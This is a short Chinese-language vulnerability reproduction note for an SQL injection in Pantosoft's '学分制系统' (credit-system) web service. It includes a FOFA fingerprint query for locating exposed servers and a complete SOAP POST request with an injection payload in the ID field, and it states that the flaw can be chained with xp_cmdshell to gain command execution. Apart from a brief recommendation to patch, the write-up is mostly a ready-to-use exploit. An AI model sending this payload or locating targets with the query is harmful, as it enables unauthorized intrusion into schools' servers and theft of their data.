S27-1上海鹏达-学分制系统-SQL
漏洞描述:
学分制系统 GetCalendarContentById、GetCurrentCalendar等实例处存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
网站图片:
fofa语法:
body=“www.pantosoft.com” && body=“Pantosoft Corporation” || icon_hash=“-1632820573”
漏洞复现:
查询数据库版本
payload:
POST /WebService_PantoSchool.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Content-Type: text/xml; charset=utf-8
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<tem:GetCalendarContentById>
<!--type: string-->
<tem:ID>1' OR 1 IN (SELECT @@version) AND '1'='1</tem:ID>
</tem:GetCalendarContentById>
</soapenv:Body>
</soapenv:Envelope>
效果图: